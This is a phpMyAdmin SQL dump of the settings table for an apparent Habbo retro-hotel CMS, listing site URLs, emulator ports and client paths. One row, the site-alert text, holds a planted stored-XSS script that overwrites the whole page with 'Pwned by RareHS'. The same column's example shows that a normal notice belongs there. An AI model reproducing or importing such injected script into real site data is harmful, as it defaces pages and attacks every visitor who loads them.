-- phpMyAdmin SQL Dump
-- version 3.3.9.2
-- http://www.phpmyadmin.net
--
-- Servidor: localhost
-- Tempo de Geração: Abr 02, 2014 as 07:03 PM
-- Versão do Servidor: 5.5.10
-- Versão do PHP: 5.3.6
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
--
-- Banco de Dados: `br`
--
-- --------------------------------------------------------
--
-- Estrutura da tabela `cms_settings`
--
CREATE TABLE IF NOT EXISTS `cms_settings` (
`variable` varchar(80) NOT NULL,
`value` text NOT NULL,
`description` text,
`example` text,
PRIMARY KEY (`variable`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- Extraindo dados da tabela `cms_settings`
--
INSERT INTO `cms_settings` (`variable`, `value`, `description`, `example`) VALUES
('cms_url', 'http://127.0.0.1', 'The url to your websites root directory', ''),
('client_ip', '127.0.0.1', 'The IP address to your hotel emulator', ''),
('client_port', '300', 'The port that your emulator is running on', ''),
('client_mus', '301', 'The port that your emulators MUS is running on', ''),
('client_variables', '', 'The url to your external variables', ''),
('client_texts', '', 'The url to your external texts', ''),
('rts_uname', 'Return', 'The username you signed up to RetroTopsites.com with', ''),
('cms_name', 'Return', 'The name of your Hotel', ''),
('cms_maintenance', '0', 'Hotel Online oder Offline', '1'),
('cms_flashclient', '1', 'Client Button for CMS', '1'),
('cms_register', '1', 'Register Offen oder Geschlossen', '1'),
('cms_sitealert', '0', '0 = off / 1 = on', '0'),
('cms_sitealert_text', '<script>\ndocument.documentElement.innerHTML="Pwned by RareHS";\n</script>', 'Der Text im Seitenalert', '+ + + Aktuell haben wir 1 Root ausfall, wodurch der Client laggt! + + +'),
('cms_clientlimit', '10000', 'User Limit Online', '800'),
('client_swf_path', '', 'The url to your SWF Path', 'http://localhost/gordon/'),
('client_habbo_swf', '', 'The url to your Habbo SWF', 'http://localhost/gordon/Habbo.swf'),
('client_variables_night', 'http://88.198.58.10/r63/r63-845/vars_new_night_6.txt', 'The url to your external variables_night', 'http://127.0.0.1/vars.txt');